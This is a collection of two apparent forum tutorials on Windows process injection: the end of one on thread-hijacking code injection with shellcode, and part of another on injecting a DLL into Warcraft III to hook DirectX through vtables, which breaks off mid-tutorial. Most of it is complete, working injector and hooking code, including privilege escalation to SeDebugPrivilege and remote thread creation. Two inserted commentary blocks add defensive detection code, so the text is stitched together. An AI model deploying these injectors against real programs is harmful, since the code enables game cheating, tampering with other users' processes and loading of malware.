        HANDLE hThread = OpenThread((THREAD_GET_CONTEXT | THREAD_SET_CONTEXT | THREAD_SUSPEND_RESUME), false, thID);
        SuspendThread(hThread);

        CONTEXT ctx;
        ctx.ContextFlags = CONTEXT_CONTROL;
        GetThreadContext(hThread, &ctx);
        oldIP = ctx.Eip;
        ctx.Eip = (DWORD)MyFuncAddress;
        ctx.ContextFlags = CONTEXT_CONTROL;

        WriteProcessMemory(p, MyFuncAddress, myFunc, size_myFunc, NULL);
        //After writing the function we patch it with the right addresses
        WriteProcessMemory(p, (void*)((unsigned long)MyFuncAddress + 1), &oldIP, 4, NULL);
        WriteProcessMemory(p, (void*)((unsigned long)MyFuncAddress + 8), &DataAddress, 4, NULL);
        WriteProcessMemory(p, (void*)((unsigned long)MyFuncAddress + 13), &Load32, 4, NULL);        //LoadLibraryA, which loads User32.dll
        WriteProcessMemory(p, (void*)((unsigned long)MyFuncAddress + 20), &MsgboxAddress, 4, NULL);
        WriteProcessMemory(p, (void*)((unsigned long)MyFuncAddress + 26), &GetProcAdr, 4, NULL);
        WriteProcessMemory(p, (void*)((unsigned long)MyFuncAddress + 35), &testoAddress, 4, NULL);
        WriteProcessMemory(p, (void*)((unsigned long)MyFuncAddress + 40), &mexAddress, 4, NULL);

        SetThreadContext(hThread, &ctx);
        ResumeThread(hThread);
        Sleep(1000);   //wait a second!
        //if we want to free the used memory and the injected code will take a short time to execute,
        //we can of course wait for it for a certain period with Sleep();
        //but if the code keeps running with no end we cannot free the memory, otherwise it will crash the target application
        //VirtualFreeEx(p, MyFuncAddress, size_myFunc, MEM_DECOMMIT);
        //VirtualFreeEx(p, DataAddress, strlen(user32)+1, MEM_DECOMMIT);

        CloseHandle(p);
        CloseHandle(hThread);
        system("PAUSE");
        return EXIT_SUCCESS;
    }

    DWORD GetThreadID(DWORD pid) {
        HANDLE hsnap;
        THREADENTRY32 pt;
        hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
        pt.dwSize = sizeof(THREADENTRY32);
        if (Thread32First(hsnap, &pt)) {            // Thread32First must precede Thread32Next
            do {
                if (pt.th32OwnerProcessID == pid) {
                    DWORD Thpid = pt.th32ThreadID;
                    CloseHandle(hsnap);
                    return Thpid;
                }
            } while (Thread32Next(hsnap, &pt));
        }
        CloseHandle(hsnap);
        return 0;
    }

    DWORD getPid(string procName) {
        HANDLE hsnap;
        PROCESSENTRY32 pt;
        hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
        pt.dwSize = sizeof(PROCESSENTRY32);
        if (Process32First(hsnap, &pt)) {           // Process32First fills the first entry
            do {
                if (!strcmp(pt.szExeFile, procName.c_str())) {
                    DWORD pid = pt.th32ProcessID;
                    CloseHandle(hsnap);
                    return pid;
                }
            } while (Process32Next(hsnap, &pt));
        }
        CloseHandle(hsnap);
        return 0;
    }

    __declspec(naked) void myFunc() {
        _asm {
            push 0xACEACEAC
            pushfd
            pushad
            push 0xACEACEAC
            mov ecx, 0xACEACEAC
            call ecx
            push 0xACEACEAC
            push eax
            mov edx, 0xACEACEAC
            call edx
            push 0
            push 0xACEACEAC
            push 0xACEACEAC
            push 0
            call eax
            popad
            popfd
            ret
        }
    }

    __declspec(naked) void Useless() {   //this lets us calculate the size of myFunc (Useless - myFunc)
        _asm ret;
    }

    int privileges() {
        HANDLE Token;
        TOKEN_PRIVILEGES tp;
        if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &Token)) {
            LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
            tp.PrivilegeCount = 1;
            tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
            if (AdjustTokenPrivileges(Token, 0, &tp, sizeof(tp), NULL, NULL) == 0) {
                return 1;   //FAIL
            } else {
                return 0;   //SUCCESS
            }
        }
        return 1;
    }

Now I want to explain a bit, for those who didn't understand, how to patch the function. Before, I stated that I put placeholders that will be replaced with the right addresses; to help you I posted the shellcode, which comes in handy when looking for the offset (position) of the placeholders. Take a look at it: we want to patch the first item (oldIP); the placeholder is 0xACEACEAC, which translated into hex is "\xac\xce\xea\xac". Now, you need to know that each "\xXX" you see is a translated byte value, and the first time we meet "\xac\xce\xea\xac" is after 1 "\xXX"... we can consider any "\xXX" as a position, so:

    position:   0    1    2    3    4    5    6   ...
    bytes:     \x68 \xac \xce \xea \xac \x9c \x60 ...

So the beginning address of MyFuncAddress corresponds to position 0 (= \x68), and the beginning of the placeholder to position 1, so MyFuncAddress + 1... here we write the right address that will replace the first "\xac\xce\xea\xac". If we look for the second we find it at the eighth position, so MyFuncAddress + 8... and so on until we patch them all. We convert MyFuncAddress from void* to unsigned long so as to do an arithmetic sum, then we convert the result back to void*:

    (void*)((unsigned long)MyFuncAddress + each_offset)

I noticed that people that use Dev-C++ get an error because it doesn't find OpenThread() and an error with asm tags; well, I suggest you get Visual C++...
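To make the offset reasoning above concrete, and to show what the same knowledge looks like from the detection side, here is an added C example. It is not part of RosDevil's post: it scans a byte buffer for the 0xACEACEAC placeholder (little-endian in memory) and reports the same seven positions the post patches, then turns those positions into wildcards in a signature that still matches the stub after real addresses have been written into it, which is how a memory scanner or a YARA-style hex rule would flag this particular stub. The filler bytes, the fake addresses and the buffer layout are constructed for the demonstration.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Stub bytes exactly as printed in the post (51 bytes; the literal's trailing NUL is not part of it). */
static const unsigned char STUB[] =
    "\x68\xac\xce\xea\xac\x9c\x60\x68\xac\xce\xea\xac\xb9\xac\xce\xea\xac"
    "\xff\xd1\x68\xac\xce\xea\xac\x50\xba\xac\xce\xea\xac\xff\xd2\x6a\x00"
    "\x68\xac\xce\xea\xac\x68\xac\xce\xea\xac\x6a\x00\xff\xd0\x61\x9d\xc3";
#define STUB_LEN (sizeof STUB - 1)

/* 0xACEACEAC as an x86 immediate in memory (little-endian). */
static const unsigned char PLACEHOLDER[4] = { 0xac, 0xce, 0xea, 0xac };

/* Record the offset of every placeholder in buf (at most max of them); return how many exist. */
size_t find_placeholders(const unsigned char *buf, size_t len, size_t *offsets, size_t max)
{
    size_t n = 0;
    for (size_t i = 0; i + 4 <= len; i++) {
        if (memcmp(buf + i, PLACEHOLDER, 4) == 0) {
            if (n < max) offsets[n] = i;
            n++;
            i += 3;   /* step over the slot; the loop's i++ lands on the byte after it */
        }
    }
    return n;
}

/* 1 if the offsets found in the stub are exactly the seven the post patches: +1, +8, +13, +20, +26, +35, +40. */
int placeholder_offsets_match_post(void)
{
    static const size_t expected[7] = { 1, 8, 13, 20, 26, 35, 40 };
    size_t found[8];
    if (find_placeholders(STUB, STUB_LEN, found, 8) != 7) return 0;
    return memcmp(found, expected, sizeof expected) == 0;
}

/* Byte mask for the signature: 1 = byte must match, 0 = wildcard (an address slot). */
static void build_mask(unsigned char *mask)
{
    size_t slots[8];
    size_t n = find_placeholders(STUB, STUB_LEN, slots, 8);
    memset(mask, 1, STUB_LEN);
    for (size_t k = 0; k < n; k++)
        memset(mask + slots[k], 0, 4);
}

/* Offset of the first match of the wildcarded stub signature in hay, or -1 if absent. */
long scan_for_stub(const unsigned char *hay, size_t hay_len)
{
    unsigned char mask[STUB_LEN];
    build_mask(mask);
    if (hay_len < STUB_LEN) return -1;
    for (size_t i = 0; i + STUB_LEN <= hay_len; i++) {
        size_t j = 0;
        while (j < STUB_LEN && (!mask[j] || hay[i + j] == STUB[j])) j++;
        if (j == STUB_LEN) return (long)i;
    }
    return -1;
}

/* Constructed demo: 200 filler bytes (0x90), optionally with a patched copy of the stub at offset 77. */
long demo_scan(int include_stub)
{
    unsigned char hay[200];
    memset(hay, 0x90, sizeof hay);
    if (include_stub) {
        size_t slots[8];
        size_t n = find_placeholders(STUB, STUB_LEN, slots, 8);
        memcpy(hay + 77, STUB, STUB_LEN);
        /* overwrite every slot with a made-up address, as the injector's patching step would */
        for (size_t k = 0; k < n; k++) {
            uint32_t fake = 0x7ff00000u + (uint32_t)(k * 0x1000u);
            memcpy(hay + 77 + slots[k], &fake, 4);
        }
    }
    return scan_for_stub(hay, sizeof hay);
}

int main(void)
{
    printf("offsets match the post: %d\n", placeholder_offsets_match_post());
    printf("patched stub found at:  %ld\n", demo_scan(1));
    printf("clean buffer:           %ld\n", demo_scan(0));
    return 0;
}
```

The mask is the whole point: a signature on the raw bytes would stop matching the moment the injector patches the slots, while wildcarding exactly the positions `find_placeholders` reports keeps the match stable across any target, because the pushes, register moves and the `pushfd/pushad ... popad/popfd/ret` frame never change.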
By the way, now I show you, in a DLL INJECTION, how you can get OpenThread() dynamically from kernel32.dll and use the shellcode instead of asm tags:

    #include <windows.h>
    #include <iostream>
    #include <fstream>
    #include <stdlib.h>
    #include <tlhelp32.h>
    #include <shlwapi.h>
    #pragma comment(lib, "shlwapi.lib")
    using namespace std;

    char shellcode[] = "\x68\xac\xce\xea\xac\x9c\x60\x68\xac\xce\xea\xac\xb8\xac\xce\xea\xac\xff\xd0\x61\x9d\xc3";

    typedef HANDLE (WINAPI* OpenThreadfunc)(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwThreadId);
    OpenThreadfunc myOpenThread;

    void setOpenThread();
    int privileges();
    DWORD getPid(string procName);
    DWORD GetThreadID(DWORD pid);
    int injectLibrary(const char * process, const char * dll);

    HMODULE kernel;

    int main(int argc, char *argv[])
    {
        injectLibrary("notepad.exe", "C:\\fullpath\\myDll");
        system("PAUSE");
        return EXIT_SUCCESS;
    }

    int injectLibrary(const char * process, const char * dll) {
        setOpenThread();
        if (myOpenThread == NULL) {
            cout << "Error with OpenThread()" << endl;
            return 1;
        }
        unsigned long oldIP;
        if (privileges() == 1) {   //if you want to check privileges you can, but sometimes if you are administrator you can perform injection without them
            cout << "Error couldn't get privileges..." << endl;
        }
        DWORD pid = getPid(process);   //use the process name passed in, not a hard-coded one
        if (pid == 0) return 1;
        HANDLE p;
        p = OpenProcess(PROCESS_ALL_ACCESS, false, pid);
        if (p == NULL) return 1;   //error

        const char * dllName = dll;
        unsigned long shsize = sizeof(shellcode);
        unsigned long Load32 = (unsigned long)GetProcAddress(kernel, "LoadLibraryA");

        void * DllAddress = VirtualAllocEx(p, NULL, strlen(dllName) + 1, MEM_COMMIT, PAGE_READWRITE);
        void * MyFuncAddress = VirtualAllocEx(p, NULL, shsize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        WriteProcessMemory(p, DllAddress, dllName, strlen(dllName), NULL);

        DWORD thID = GetThreadID(pid);
        HANDLE hThread = myOpenThread((THREAD_GET_CONTEXT | THREAD_SET_CONTEXT | THREAD_SUSPEND_RESUME), false, thID);
        SuspendThread(hThread);

        CONTEXT ctx;
        ctx.ContextFlags = CONTEXT_CONTROL;
        GetThreadContext(hThread, &ctx);
        oldIP = ctx.Eip;
        ctx.Eip = (DWORD)MyFuncAddress;
        ctx.ContextFlags = CONTEXT_CONTROL;

        WriteProcessMemory(p, MyFuncAddress, &shellcode, shsize, NULL);
        WriteProcessMemory(p, (void*)((unsigned long)MyFuncAddress + 1), &oldIP, 4, NULL);
        WriteProcessMemory(p, (void*)((unsigned long)MyFuncAddress + 8), &DllAddress, 4, NULL);
        WriteProcessMemory(p, (void*)((unsigned long)MyFuncAddress + 13), &Load32, 4, NULL);

        SetThreadContext(hThread, &ctx);
        ResumeThread(hThread);

        CloseHandle(p);
        CloseHandle(hThread);
        FreeLibrary(kernel);
        return 0;
    }

    void setOpenThread() {
        kernel = LoadLibrary("kernel32.dll");
        if (kernel != NULL)
            myOpenThread = (OpenThreadfunc)GetProcAddress(kernel, "OpenThread");
    }

    DWORD getPid(string procName) {
        HANDLE hsnap;
        PROCESSENTRY32 pt;
        hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
        pt.dwSize = sizeof(PROCESSENTRY32);
        if (Process32First(hsnap, &pt)) {           // Process32First fills the first entry
            do {
                if (!strcmp(pt.szExeFile, procName.c_str())) {
                    DWORD pid = pt.th32ProcessID;
                    CloseHandle(hsnap);
                    return pid;
                }
            } while (Process32Next(hsnap, &pt));
        }
        CloseHandle(hsnap);
        return 0;
    }

    DWORD GetThreadID(DWORD pid) {
        HANDLE hsnap;
        THREADENTRY32 pt;
        hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
        pt.dwSize = sizeof(THREADENTRY32);
        if (Thread32First(hsnap, &pt)) {            // Thread32First must precede Thread32Next
            do {
                if (pt.th32OwnerProcessID == pid) {
                    DWORD Thpid = pt.th32ThreadID;
                    CloseHandle(hsnap);
                    return Thpid;
                }
            } while (Thread32Next(hsnap, &pt));
        }
        CloseHandle(hsnap);
        return 0;
    }

    int privileges() {
        HANDLE Token;
        TOKEN_PRIVILEGES tp;
        if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &Token)) {
            LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
            tp.PrivilegeCount = 1;
            tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
            if (AdjustTokenPrivileges(Token, 0, &tp, sizeof(tp), NULL, NULL) == 0) {
                return 1;   //FAIL
            } else {
                return 0;   //SUCCESS
            }
        }
        return 1;
    }

WELL, FINISHED!! I hope this tutorial will help you! ENJOY CODING!

RosDevil

Source: Code Injections [beginner and advanced] - rohitab.com - Forums
-
Run-time directx hooking using code injection and vtable

Author: AnthIste

Okay folks, today I'll be teaching you how to take control of DirectX without the use of MS Detours or somehow hooking Direct3DCreate. You will be able to inject your dll at any time and still have a working hook. This might not be the best way to do it, but it certainly worked for me. It might not work on the specific version of DirectX you have installed, though (more on that later). Even if it doesn't work universally I'm sure there could be a workaround, and at least I learnt something (and I would like to share that).

NOTE: I am not an emotionless bastard, but I couldn't post with all my smileys... bleh.

DISCLAIMER: Any loss of brain cells reading this long-ass tutorial is your own responsibility. Also, the usual: use at your own risk, don't use it to hurt people etc.... Learn something and apply it constructively.

Required Knowledge / Tools

I expect you to have a solid understanding of the following (else following this might be difficult):
- Dll injection and the possibilities that it creates
- X86 Assembly
- C++ (especially function pointers)
- Simple detours
- Debugging with OllyDbg
- CheatEngine
- DirectX
- DirectX SDK

Introduction

I started this project quite accidentally. I am not aware of any d3d hacks for Warcraft III (or the purpose of having one) so I thought it could be a challenge to make one. This game dynamically loads d3d8.dll to set up all its DirectX-related stuff. I'll use this game as an example because even though DirectX8 is old technology the theory still applies to DirectX9 (tested and working). I also think it's a pretty popular game, so if you have a copy you can whip it out and work with me here.
It's also the only game that I have that seems to load the DirectX module at runtime, which is cool because this system works regardless of that (and what's the fun if it's too easy). This IS the first tutorial that I've ever written so bear with me. As I work through this I'll put some screenies to show what's going on. I guess images don't stay linked forever so I'll put a copy of the disassembly with the picture.

Please note that this tutorial will focus a lot on the theory of the process, so if you don't understand why certain variables are placed where, or need to be told in what source file and between which braces a certain piece of code goes, I suggest you learn more C++ and then come back for a second run.

Overview of procedure

Before I dive right into the action I'll just give a brief overview of what we're going to do here. Don't worry if it doesn't all make sense, I'll go through everything in more detail soon.

=PART 1 : Information gathering dll and loader=
- Make a loader that will spawn the process we are working on (in this case war3.exe)
- Start it with the CREATE_SUSPENDED flag and inject our dll
- Resume the process. This dll WILL hook Direct3DCreate8. If we have access to an instance of an IDirect3D8 object we have access to just about everything.
- Hook CreateDevice using this object's vtable. When CreateDevice is called we have access to the created IDirect3DDevice8 object (and all its methods via the vtable).
- We will log all the info that we get here (pointers / addresses of objects and methods, offsets etc) for use in creating the final code.

=PART 2 : Final dll=
- This dll can be injected with anything (eg winject) so I won't go over making a loader for it as well (but the above one will work after a bit of modification I guess).
- After finding what we were looking for in PART 1 we will do a bit of code injection to steal the address of our d3d device.
- Use this device to do a vtable hook on any desired d3d methods

------------------- PART 1 : Loader and information gathering ---------------------------------

Woohoo, time to start coding... We'll start off with the loader. Open up VC++ and create a new empty win32 project. Call it Loader. Add 3 new files:

    main.cpp
    inject.h
    inject.cpp

inject.h will just have includes and the definition for our function:

    // inject.h
    #ifndef INC_INJECT
    #define INC_INJECT

    #include <windows.h>
    #include <iostream>

    HMODULE InjectDLL(DWORD ProcessID, char* dllName);

    #endif

inject.cpp will contain our injection function. I'm not going to deal with how that works, there are more than enough tutorials on the topic. Credit for this code goes to < bah can't find out whose it is :/, that's not good >

    // inject.cpp
    #include <cstdio>
    #include "inject.h"

    HMODULE InjectDLL(DWORD ProcessID, char* dllName)
    {
        HANDLE Proc;
        HANDLE Thread;
        char buf[50] = {0};
        LPVOID RemoteString, LoadLibAddy;
        HMODULE hModule = NULL;
        DWORD dwOut;

        if (!ProcessID) return NULL;

        Proc = OpenProcess(PROCESS_ALL_ACCESS, 0, ProcessID);
        if (!Proc) {
            sprintf_s(buf, "OpenProcess() failed: %d", GetLastError());
            MessageBoxA(NULL, buf, "Loader", NULL);
            return NULL;
        }

        LoadLibAddy = (LPVOID)GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryA");
        if (!LoadLibAddy) {
            return NULL;
        }

        // +1 so the terminating NUL of the path is allocated and written as well
        RemoteString = (LPVOID)VirtualAllocEx(Proc, NULL, strlen(dllName) + 1, MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE);
        if (!RemoteString) {
            return NULL;
        }

        if (!WriteProcessMemory(Proc, (LPVOID)RemoteString, dllName, strlen(dllName) + 1, NULL)) {
            return NULL;
        }

        Thread = CreateRemoteThread(Proc, NULL, NULL, (LPTHREAD_START_ROUTINE)LoadLibAddy, (LPVOID)RemoteString, NULL, NULL);
        if (!Thread) {
            return NULL;
        } else {
            while (GetExitCodeThread(Thread, &dwOut)) {
                if (dwOut != STILL_ACTIVE) {
                    hModule = (HMODULE)dwOut;
                    break;
                }
            }
        }

        CloseHandle(Thread);
        CloseHandle(Proc);
        return hModule;
    }

Ok, time to make a loader. I've tried my best to comment the code so that it explains itself, but here goes anyway.
The loader and the dll will both be placed in the game's directory. We use GetModuleFileName to find the current directory. Append the target executable's name and our dll's name to the path to get the full path for use in injection and CreateProcess.

    // main.cpp
    #include <windows.h>
    #include <iostream>
    #include "inject.h"

    const char* EXE_NAME = "war3.exe";   // target executable
    const char* DLL_NAME = "dll.dll";    // dll to inject

    int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
    {
        char path[MAX_PATH];
        char exename[MAX_PATH];
        char dllname[MAX_PATH];

        // acquire full path to exe:
        GetModuleFileNameA(0, path, MAX_PATH);

        // find the position of the last backslash and delete whatever follows
        // (eg C:\Games\loader.exe becomes C:\Games\)
        int pos = 0;
        for (int k = 0; k < (int)strlen(path); k++) {
            if (path[k] == '\\') {
                pos = k;
            }
        }
        path[pos+1] = 0;   // null-terminate it for strcat

        // build path to target
        strcpy_s(exename, path);
        strcat_s(exename, EXE_NAME);

        // build path to dll
        strcpy_s(dllname, path);
        strcat_s(dllname, DLL_NAME);

        // launch program:
        STARTUPINFOA siStartupInfo;
        PROCESS_INFORMATION piProcessInfo;
        memset(&siStartupInfo, 0, sizeof(siStartupInfo));
        memset(&piProcessInfo, 0, sizeof(piProcessInfo));
        siStartupInfo.cb = sizeof(siStartupInfo);

        if (!CreateProcessA(NULL, exename, 0, 0, false, CREATE_SUSPENDED, 0, 0, &siStartupInfo, &piProcessInfo)) {
            MessageBoxA(NULL, exename, "Error", MB_OK);
        }

        // get the process id for injection
        DWORD pId = piProcessInfo.dwProcessId;

        // Inject the dll
        if (!InjectDLL(pId, dllname)) {
            MessageBoxA(NULL, "Injection failed", "Error", MB_OK);
        }

        ResumeThread(piProcessInfo.hThread);

        return 0;
    }

Now that we have a loader we need something to actually inject. Add a new win32 dll project and call it dll. First off add another main.cpp to this project.
    #include <windows.h>
    #include <detours.h>
    #pragma comment(lib, "detours.lib")

    BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
    {
        switch (ul_reason_for_call) {
            case DLL_PROCESS_ATTACH: {
                DisableThreadLibraryCalls(hModule);
                // Apply the hook
            }
        }
        return TRUE;
    }

Hmm ok, we know that the game uses LoadLibraryA to access DirectX. This means that we cannot directly hook Direct3DCreate8 because a) it isn't loaded yet, b) we wouldn't know the address of it. What we're going to do is firstly hook the LoadLibraryA function.

    typedef HMODULE (WINAPI *LoadLibrary_t)(LPCSTR);
    LoadLibrary_t orig_LoadLibrary;   // holds address of original non-detoured function

    // Our hooked LoadLibrary
    HMODULE WINAPI LoadLibrary_Hook(LPCSTR lpFileName)
    {
        HMODULE hM = orig_LoadLibrary(lpFileName);   // keep functionality
        return hM;
    }

    // When the dll loads
    orig_LoadLibrary = (LoadLibrary_t)DetourFunction((LPBYTE)LoadLibraryA, (LPBYTE)LoadLibrary_Hook);

Ok well, for starters you can build the solution, place the 2 output files in your game directory and see if it actually works so far. If it doesn't crash, sweet, we're ready to continue.

We'll use our hooked function to see when d3d8.dll is actually being loaded. When it does, we can get the address of Direct3DCreate8 and detour that too. During testing I saw that the game loads the dll a few times before carrying on, so if you're working on another game that doesn't, you can take the counter check out.

    // Our hooked LoadLibrary
    HMODULE WINAPI LoadLibrary_Hook(LPCSTR lpFileName)
    {
        static int hooked = 0;
        HMODULE hM = orig_LoadLibrary(lpFileName);

        if (strcmp(lpFileName, "d3d8.dll") == 0) {
            hooked++;
            if (hooked == 3) {
                // get address of function to hook
                pDirect3DCreate8 = (PBYTE)GetProcAddress(hM, "Direct3DCreate8");
                HookAPI();
            }
        }

        return hM;
    }

To hook Direct3DCreate8 we will need a few more variables.
    // globals

    // Our hook function
    IDirect3D8* __stdcall hook_Direct3DCreate8(UINT sdkVers);

    // The original to call
    typedef IDirect3D8* (__stdcall *Direct3DCreate8_t)(UINT SDKVersion);
    Direct3DCreate8_t orig_Direct3DCreate8;

    // Holds address that we get in our LoadLibrary hook (used for detour)
    PBYTE pDirect3DCreate8;

The HookAPI() function looks as follows:

    void HookAPI()
    {
        // simple detour
        orig_Direct3DCreate8 = (Direct3DCreate8_t)DetourFunction(pDirect3DCreate8, (PBYTE)hook_Direct3DCreate8);
    }

Now we have access to the created IDirect3D object:

    IDirect3D8* __stdcall hook_Direct3DCreate8(UINT sdkVers)
    {
        IDirect3D8* pD3d8 = orig_Direct3DCreate8(sdkVers);   // real one

        // Use a vtable hook on CreateDevice to get the device pointer later
        DWORD* pVtable = GetVtableAddress(pD3d8);
        HookFunction(pVtable, (void*)&hook_CreateDevice, (void*)&orig_CreateDevice, 15);

        return pD3d8;
    }

Okay, now you might be wondering wtf is going on. Let me explain. An object that has virtual methods is laid out in memory like so (roughly):

    --Object--
    pointer to vtable (4 bytes)
    member 1
    member 2
    ...
    ----------

    --VTable--
    pointer to method 1 (4 bytes)
    pointer to method 2 (4 bytes)
    ...
    ----------

This means that if we have a pointer to an object (all that work up there), we have access to its vtable (which has the addresses of all its functions). We can get this pointer with the following code:

    DWORD* GetVtableAddress(void* pObject)
    {
        // The first 4 bytes of the object is a pointer to the vtable:
        return (DWORD*)*((DWORD*)pObject);
    }

If we have access to the vtable, it should be pretty easy to replace the pointer of any of its virtual functions to point to a hooked function that we define. There is one issue. If you have a C++ class

    class Foo
    {
        virtual void Method1(int a);
    };

, Method1 has parameters

    void Method1(Foo* pThis, int a);

This is where the this pointer comes from. The compiler inserts that for you.
This means that if we want to hook any of IDirect3D8's methods using the vtable we define them with an extra pointer, mmkay.

In order to hook a function you will need its offset from the base address of the vtable. You can find these offsets online or simply count in the d3d8.h file from the SDK. The vtable is write-protected so we need a few calls to VirtualProtect to overwrite anything. A little function to hook a vtable address:

    void HookFunction(DWORD* pVtable, void* pHookProc, void* pOldProc, int iIndex)
    {
        // Enable writing to the vtable at address we acquired
        DWORD lpflOldProtect;
        VirtualProtect((void*)&pVtable[iIndex], sizeof(DWORD), PAGE_READWRITE, &lpflOldProtect);

        // Store old address
        if (pOldProc) {
            *(DWORD*)pOldProc = pVtable[iIndex];
        }

        // Overwrite original address
        pVtable[iIndex] = (DWORD)pHookProc;

        // Restore protection on the same slot we unprotected
        VirtualProtect((void*)&pVtable[iIndex], sizeof(DWORD), lpflOldProtect, &lpflOldProtect);
    }

All the pointer dereferencing is way confusing O_O. If you can't follow it just read over it a few times till it makes sense. Anyways, back to what we were trying to do.. We wanted to hook CreateDevice sooo....
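As an added example, not AnthIste's code, here is the object/vtable layout from the two diagrams above rendered as a plain C struct, together with the integrity check a defender would run against such a table: snapshot the slot pointers the first time the object is seen, and later report any slot whose pointer has changed (and put the recorded pointers back). The Device type, its three methods and the slot numbers are made up for the demonstration; `install_test_hook` overwrites one slot in the shared table purely so the check has something to report.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical "class" with three virtual methods, laid out as the post describes:
   the first word of the object is the pointer to its vtable, and the vtable is an
   array of function pointers. The object pointer is the explicit first parameter,
   exactly like the extra pointer the post adds to its hook procs. */
typedef struct Device Device;
typedef int (*DevMethod)(Device *self, int arg);

enum { SLOT_BEGIN_SCENE = 0, SLOT_END_SCENE = 1, SLOT_PRESENT = 2, SLOT_COUNT = 3 };

typedef struct {
    DevMethod methods[SLOT_COUNT];
} DevVtable;

struct Device {
    DevVtable *vptr;   /* first member: the vtable pointer */
    int frames;        /* an ordinary member following it */
};

static int dev_begin_scene(Device *self, int n)      { self->frames += n; return 0; }
static int dev_end_scene(Device *self, int unused)   { (void)unused; return self->frames; }
static int dev_present(Device *self, int unused)     { (void)unused; return self->frames * 2; }

/* One writable table shared by every Device, like the one the post patches through VirtualProtect. */
static DevVtable g_device_vtable = { { dev_begin_scene, dev_end_scene, dev_present } };

Device make_device(void)
{
    Device d = { &g_device_vtable, 0 };
    return d;
}

/* The post's GetVtableAddress: the first word of the object is the vtable pointer. */
DevVtable *get_vtable(void *obj)
{
    return *(DevVtable **)obj;
}

/* Dispatch through the table, the way a compiler emits a virtual call. */
int call_slot(Device *d, int slot, int arg)
{
    return get_vtable(d)->methods[slot](d, arg);
}

/* Snapshot taken when the object is first seen; compared later to catch overwritten slots. */
typedef struct {
    DevVtable *table;
    DevMethod saved[SLOT_COUNT];
} VtableSnapshot;

void snapshot_vtable(Device *d, VtableSnapshot *s)
{
    s->table = get_vtable(d);
    memcpy(s->saved, s->table->methods, sizeof s->saved);
}

/* Index of the first slot whose pointer no longer equals the snapshot, or -1 if all intact. */
int vtable_first_modified_slot(const VtableSnapshot *s)
{
    for (int i = 0; i < SLOT_COUNT; i++)
        if (s->table->methods[i] != s->saved[i]) return i;
    return -1;
}

/* Remediation after detection: write the recorded pointers back. */
void restore_vtable(const VtableSnapshot *s)
{
    memcpy(s->table->methods, s->saved, sizeof s->saved);
}

/* Stand-in hook used only to exercise the check: calls the original and marks the result. */
static DevMethod g_saved_original;
static int marked_method(Device *self, int arg) { return g_saved_original(self, arg) + 1000; }

void install_test_hook(int slot)
{
    g_saved_original = g_device_vtable.methods[slot];
    g_device_vtable.methods[slot] = marked_method;
}

/* Full scenario; returns the slot the check reported (expected SLOT_END_SCENE) and leaves the table clean. */
int demo_detect_hook(void)
{
    Device d = make_device();
    VtableSnapshot s;
    snapshot_vtable(&d, &s);
    call_slot(&d, SLOT_BEGIN_SCENE, 5);   /* frames = 5 */
    install_test_hook(SLOT_END_SCENE);
    int reported = vtable_first_modified_slot(&s);
    restore_vtable(&s);
    return reported;
}

int main(void)
{
    printf("detected slot: %d\n", demo_detect_hook());
    return 0;
}
```

The same two checks carry over to a real COM vtable: compare each slot against the value recorded when the interface was first obtained, and treat any entry that moved as a hook. With d3d8.dll the recorded values would all lie inside that module's image, which gives a second, snapshot-free test (does the slot still point into d3d8.dll?) that the comparison above does not need but a production check would add.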
Let's start with a few more globals:

    // CreateDevice
    typedef HRESULT (APIENTRY *CreateDevice_t)(IDirect3D8*, UINT, D3DDEVTYPE, HWND, DWORD, D3DPRESENT_PARAMETERS*, IDirect3DDevice8**);
    CreateDevice_t orig_CreateDevice;
    HRESULT APIENTRY hook_CreateDevice(IDirect3D8* pInterface, UINT Adapter, D3DDEVTYPE DeviceType, HWND hFocusWindow, DWORD BehaviorFlags, D3DPRESENT_PARAMETERS* pPresentationParameters, IDirect3DDevice8** ppReturnedDeviceInterface);

And the hook proc (note the extra pointer):

    #include <cstdio>
    #include <fstream>

    HRESULT APIENTRY hook_CreateDevice(IDirect3D8* pInterface, UINT Adapter, D3DDEVTYPE DeviceType, HWND hFocusWindow, DWORD BehaviorFlags, D3DPRESENT_PARAMETERS* pPresentationParameters, IDirect3DDevice8** ppReturnedDeviceInterface)
    {
        HRESULT ret = orig_CreateDevice(pInterface, Adapter, DeviceType, hFocusWindow, BehaviorFlags, pPresentationParameters, ppReturnedDeviceInterface);

        // Registers MUST be preserved when doing your own stuff!!
        __asm pushad

        // get a pointer to the created device
        IDirect3DDevice8* d3ddev = *ppReturnedDeviceInterface;

        // lets log it (format in hex mode to make it easier to work with)
        char buf[50] = {0};
        sprintf_s(buf, sizeof(buf), "pD3ddev: %X", d3ddev);

        std::ofstream of;
        of.open("C:\\d3d_log.txt", std::ios::app);   // append mode
        of << buf;
        of.close();

        __asm popad

        return ret;
    }

PHEW. Done with this part. Now you might be wondering WTF all that trouble was for. Well. We'll get to that.

------------------- PART 2 : Making the runtime hook ---------------------------------

Let's start with a bit more theory. With what we have just done we can hook any of IDirect3DDevice8's methods, eg EndScene or DrawIndexedPrimitive, in a similar way to hooking CreateDevice. But then we would have to start the game with our loader every time. We need a way of getting the device pointer without any of the hooks we used. This is where I decided to do a bit of code injection.

Let's get going. Start the game using your loader. Don't exit it, we're gonna start debugging.
